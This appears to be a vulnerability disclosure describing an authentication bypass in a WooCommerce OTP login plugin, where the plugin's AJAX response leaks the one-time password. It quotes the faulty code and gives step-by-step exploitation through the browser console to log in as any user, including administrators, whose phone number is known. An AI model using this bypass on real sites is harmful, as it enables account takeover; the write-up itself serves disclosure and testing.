The plugin was affected by an Auth Bypass vulnerability. To bypass authentication, we only need to know the user’s phone number. Depending on whose phone number we know, we may even be given an administrator role on the website.


Let’s check the plugin

The request_otp() method in the Xoo_Ml_Phone_Verification class generates and sends an otp with the following code:

$otp = Xoo_Ml_Otp_Handler::sendOTPSMS( $phone_code, $phone_no );

but the otp is also returned in the ajax response:

	'otp_sent' 	=> 1,
	'otp' 		=> $otp,
	'phone' 	=> $phone_code.$phone_no,
	'phone_no' 	=> $phone_no,
	'phone_code'=> $phone_code,
	'error' 	=> 0,
	'otp_txt' 	=> sprintf( __( 'Please enter the OTP sent to <br> %s', 'mobile-login-woocommerce' ), $phone_code.$phone_no ),

The problem is that the password, which should only be received by the user via sms, becomes public in this way.


Let’s configure the plugin

Vulnerability is only present at Amazon and Twilio Phone Operator.

In the plugin settings, under the Phone tab, select “Amazon” for the “Phone Operator”. Then, under the Services tab, in the Amazon SNS Settings, enter the “Access key” and “Secret access key”.

Then, in the user profile, we need to set the “Phone”.

These settings are required to log in to the website using otp.


Let’s see how we can exploit this vulnerability

All we have to do is check the request response, the easiest way is with the browser console.

Screenshot: OTP Login/Signup Woocommerce – Login with OTP at WooCommerce

Screenshot: OTP Login/Signup Woocommerce – Enter OTP, and and the password in reponse

As we can see in the screenshot, the password is included in the json in the response:

{"error":0,"otp":461129,"otp_sent":1,"otp_txt":"Please enter the OTP sent to <br> +3630xxxxxxx","phone":"+3630xxxxxxx","phone_code":"+36","phone_no":"30xxxxxxx"}

If we enter this password in the “Enter OTP” field and click on the Login with OTP button, we will log in to the given user.



As we can see on the screenshot, we received the same OTP from the service provider via SMS:

Screenshot: OTP Login/Signup Woocommerce – SMS from the provider


Try it

Feel free to try and use the WordPress websites for testing. I have set the roles and capabilities, so you can only get low level access to the website.